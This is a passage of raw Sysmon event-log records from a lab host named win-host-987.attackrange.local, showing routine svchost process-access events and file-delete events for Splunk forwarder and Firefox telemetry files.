10341000x800000000000000036498477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.380{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C669A0ECF85A65FDC7B907616C03D66F,SHA256=9E76343F2DD24719E8968004B9A3DF021E83E05E191EC57B3F2A683270152F94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=2ECF2A124512142A05AF38BF9A30E591,SHA256=EDCB64D25954992156369616320687C5CF94E935A90FE2636AAE47D41640E610,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=2AD636848D2A1D27241647831440C943,SHA256=58CA924CDEFC684DB546A5D171AB3AB5CE0A357D980C38D050B0F90CB236BDF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=FAC79F2039A1A3AE1F58A50E72D2422C,SHA256=434138DCEAD8F39302BF1353EEBFD679F0C35B50964DA6B8DE646C6502D6EC6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=BA57EFB779E4790722DC6E4823182399,SHA256=AE6545E3D03E998FC554D3F82FA6949421EC998A67B4B8295603DDBCE35A6582,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla 